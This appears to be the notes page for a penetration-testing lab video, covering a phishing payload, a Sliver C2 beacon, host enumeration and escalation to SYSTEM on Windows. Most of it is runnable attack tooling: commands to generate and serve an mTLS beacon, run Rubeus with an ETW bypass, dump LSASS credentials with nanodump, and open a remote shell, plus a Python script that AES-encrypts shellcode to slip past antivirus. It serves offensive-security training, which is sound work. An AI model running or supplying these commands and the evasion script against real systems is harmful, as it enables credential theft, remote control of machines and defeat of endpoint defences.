VL Shinra Part 3 – Initial Payload Design, Host Enumeration & getting SYSTEM
This is the third video of the Shinra series. We will get a shell on Ashleighs machine & escalate privileges.
Topics
- Phishing: Payload design & getting a shell
- Sliver Basics
- Host enumeration
- Switching users with runas
- Exploiting SeDebugPrivilege to get SYSTEM
- Post Exploitation
Additional things to try on the lab:
- See if you can run the domain enumeration steps on client01 in constrast to using your own machine, e.g. port-scanning, bloodhound, adcs, credential spraying etc.
- Craft a payload using any other technique so it gets around the AV
- Craft a payload using indirect syscalls or modify the existing one so it uses DLL Hijacking instead
Notes
Sliver
# generate a beacon
generate beacon --mtls 127.0.0.1:53 --os windows --arch amd64 --format shellcode --save xct.raw
# start listener
mtls --lport 53
# execute assembly (in-process, bypasss ETW)
execute-assembly -i -E /home/xct/drop/Rubeus.exe klist|triage|...
# nanodump via armory
ps (list lsass process id)
nanodump 680 core.dmp 1 PMDM
# interactive shell (you can omit the argument to get powershell)
shell --shell-path "c:\\windows\\system32\\cmd.exe"
Encrypt Shellcode with AES
from base64 import b64encode, b64decode
from binascii import unhexlify, hexlify
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
import sys
if __name__ == "__main__":
if len(sys.argv) < 3:
print("Usage: ./shellcode_encrypt file key iv")
exit(1)
file_name = sys.argv[1]
password = sys.argv[2].encode()
iv = sys.argv[3].encode()
data = []
with open(file_name,"rb") as f:
data = f.read()
print(f"Key: {password}")
print(f"IV: {iv}")
print(f"Data: {data[:16]}..")
data = pad(data, AES.block_size)
cipher = AES.new(password, AES.MODE_CBC, iv)
cipher_text = cipher.encrypt(data)
with open('xct.bin','wb') as f:
f.write(cipher_text)
